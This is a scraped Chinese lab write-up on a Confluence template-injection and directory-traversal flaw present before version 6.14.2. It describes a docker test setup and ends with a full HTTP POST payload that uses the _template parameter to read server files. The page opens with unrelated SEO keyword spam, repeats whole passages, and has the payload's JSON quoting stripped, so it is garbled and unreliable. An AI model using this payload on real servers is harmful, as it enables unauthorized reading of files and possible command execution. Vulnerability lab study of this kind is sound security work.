西安官网seo方法,焦作网站seo,多语言网站多域名推广,黄冈公司网站推广软件首选漏洞描述
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。
Atlassian Confluence 6.14.2 版本之前存在一个未经授权的目录遍历漏洞#xff0c;攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令。
漏洞环境及漏洞利用
启动docker环境…漏洞描述
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。
Atlassian Confluence 6.14.2 版本之前存在一个未经授权的目录遍历漏洞攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令。
漏洞环境及漏洞利用
启动docker环境 环境启动后访问您将看到安装指南选择“试用安装”然后系统会要求您填写许可证密钥。您应该向 Atlassian 申请 Confluence Server 测试证书http://your-ip:8090 然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长建议使用4G以上内存的机器进行安装测试请耐心等待。
如果系统提示填写群集节点则可以用 填充路径。/home/confluence 然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长建议使用4G以上内存的机器进行安装测试请耐心等待。
如果系统提示填写群集节点则可以用 填充路径。/home/confluence 如此配置即可账号密码都为postgres 完成所有配置看到以下画面 burp发送payload即可验证漏洞 POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: localhost:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://localhost:8090/pages/resumedraft.action?draftId786457draftShareId056b55bc-fc4a-487b-b1e1-8f673f280c23 Content-Type: application/json; charsetutf-8 Content-Length: 177 {contentId: 786458, macro:{name: widget, body:, params:{url: https://www.viddler.com/v/23464dc6, width: 1000, height: 1000,_template:./web.xml}}}
